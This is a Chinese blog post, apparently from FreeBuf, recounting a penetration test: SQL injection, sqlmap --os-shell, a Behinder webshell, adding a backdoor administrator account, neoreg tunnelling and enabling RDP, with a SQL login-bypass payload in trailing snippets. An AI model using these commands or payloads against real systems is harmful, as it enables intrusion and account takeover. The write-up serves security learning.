记一次简单的且不完全的从外到内的渗透测试实战

VSole2022-07-28 08:17:58

本文相关知识点

SQlMAP --os-shell拿下webshell

众所周知,--os-shell的使用条件较为苛刻,必须满足:

  • dba权限
  • 网站绝对路径
  • php中的gpc为off,php为自动转义的状态

其中我想分享的是--os-shell的原理,其实就是很简单的两个脚本文件的上传:

遍历路径,into outfile函数将可执行的php文件,这个php文件(tmpukjhb.php)主要是起一个文件上传的作用。

然后通过tmpukjhb.php上传一个可以执行命令的php文件(tmpbezal.php),并将其结果返回出来。

(上次面试被问到了,没答出来,所以印象深刻)

nt authority \system和administrator

nt authority \system是系统的最高权限

administrator是用户的最高权限

reGeorg+proxifier流量转发

针对web应用服务器的getshell

通过对网站乱七八糟的一通乱点,发现有个熟悉的老朋友

见到这种,就不得不试试sql注入了。

在后面跟上单引号,直接报错

确定好注入点之后,sqlmap一把梭

一般我遇到sql注入首先看是不是dba权限,是的话大概率就能--os-shell就直接拿shell很方便。

麻溜的--is-dba,果然是

虽然现在没有绝对路径,但是sqlmap有字典可以先试试

只能说是很perfect

但是鉴于sqlmap返回太慢且只能返回whoami(估计是被杀了)不方便之后的操作,所以我访问了根目录底下的tmpukjhb.php上传了一个冰蝎的马。


不完全的后渗透

通过whoami命令可以知道当前用户是nt authority \system(怎么会有人用计算机最高权限去部署服务呢?我不理解)

当然,有了最高权限就可以为所欲为了(白捡了一个哈哈哈哈)

然后就是常规步骤了(也不能说是常规,主要是最高计算机管理员给省略了很多步骤):

net user检查存在用户

net user admin admin / add创建一个名为admin的管理员用户

net localgroup administrators admin /add把admin用户添加到最高管理员用户组

net user admin查看用户权限

netstat -an | find "3389"查找3389端口是否开启

接着使用neoreg转发流量,把tuunel.php上传到根目录,并访问它

使用本地4444端口建立socks连接:python3 neoreg.py -k shy -u https://xxx.com/php/tunnel.php-p 4444

测试代理:使用代理访问搜狗curl -x socks5h://127.0.0.1:4444 https://www.sougou.com/

获取ip

进行流量代理

把loaclhost改成socks5代理

然后去远程桌面连接,把允许多人远程在线开启起来,方便之后的操作

结语

小菜鸟的文章,后面的操作比如横向、维持、清理等,都没有去做,只能说还要继续努力呀!

因为是从我笔记里面截的图(之前的图没有脱敏),所以可能有点糊,影响大家的观感(当然我觉得我这种小菜鸟的文章应该没人看哈哈哈哈),很真诚的给大家致歉!

如果本文有不正确的地方,希望各位大佬多(轻)多(点)包(喷)含(我),不(搞)吝(快)赐(带)教(我)!谢谢大家!

参考链接

https://www.cnblogs.com/zzjdbk/p/13951047.html

https://www.cnblogs.com/-qing-/p/10517114.html

本文作者:ARanZN, 转载请注明来自FreeBuf.COM
渗透测试admin
本作品采用《CC 协议》,转载必须注明作者和本文链接
漏洞挖掘是网络安全的一个核心之一,很多学员在靶场练习时就发现了很多问题,但是由于特殊原因不一定能得到实际解决,我们来研究一下漏洞挖掘中的实际情况,不过随着各企业安全意识的增强,以及各类waf的出现。一些像sql注入,文件上传,命令执行这些漏洞也不是那么好挖了。
分享一下今天对某app进行渗透测试,从基础的信息收集到拿到网站的shell。输入admin2显示账号未注册,所以此处存在账号枚举漏洞3. 进行表单爆破使用burpsuite先进行枚举存在的账号,测试发现存在admin和wangjie两个账号使用这两个账号然后对密码进行爆破。于是我搜索该app对应的公司,然后看他们公司的招聘岗位。发现正在招聘安卓开发,好家伙,那不就是java吗6. 上传jsp冰蝎?访问马子,没啥反应,估计行了吧?
分享一下今天对某app进行渗透测试,从基础的信息收集到拿到网站的shell。输入admin2显示账号未注册,所以此处存在账号枚举漏洞3. 进行表单爆破使用burpsuite先进行枚举存在的账号,测试发现存在admin和wangjie两个账号使用这两个账号然后对密码进行爆破。
由于测试过程中很多系统我们能接触到的只有一个登陆界面,所以要充分挖掘漏洞,进行深入操作登录 注册万能密码绕过登录存在 SQL 注入的情况下,有可能使用万能密码直接登录admin' or '1'='1'--. 有超级多登录口 SQL 注入存在 SQL 注入的话直接注出账密有些可以构造用户注入登录,比如熊海 cms 后台登录处存在 sql 注入$login=$_POST['login'];
在偶尔进行渗透的过程中,对目标资产下存在的系统进行观察的时候,发现了两处逻辑漏洞,然后根据系统底部的版权信息利用搜索引擎一检索,两处通用漏洞就到手了,这里进行简单的一个记录。
找到了半天居然找不到一个有效的密码最后在robots.txt中看到CMS的信息-EmpireCMS查询知道是开源cms后,直接百度查询数据表结构知道了管理员记录表为phome_enewsuser,在源码里全局搜索敏感信息泄露点击进去得到管理员用户名,
中国蚁剑使用Electron构建客户端软件,Electron实现上用的是Node.js,并且Node.js能执行系统命令,故可以利用蚁剑的webshell页面嵌入js来直接执行命令,进而钓鱼来上线CS。(类似Goby,Goby也是使用Electron构建客户端软件)
先Fuzz测试跑一遍收集到的子域名,这里使用的是Burp的Intruder功能。若看到一个服务端返回200的状态码,即表面成功找到一个在HOST白名单中的子域名。和 X-Rewrite-URL 标头绕过 Web 服务器的限制。通过支持 X-Original-URL 和 X-Rewrite-URL 标头,用户可以使用 X-Original-URL 或 X-Rewrite-URL HTTP 请求标头覆盖请求 URL 中的路径,尝试绕过对更高级别的缓存和 Web 服务器的限制Request
服务端一般使用 Referer 请求头识别访问来源。
VSole
网络安全专家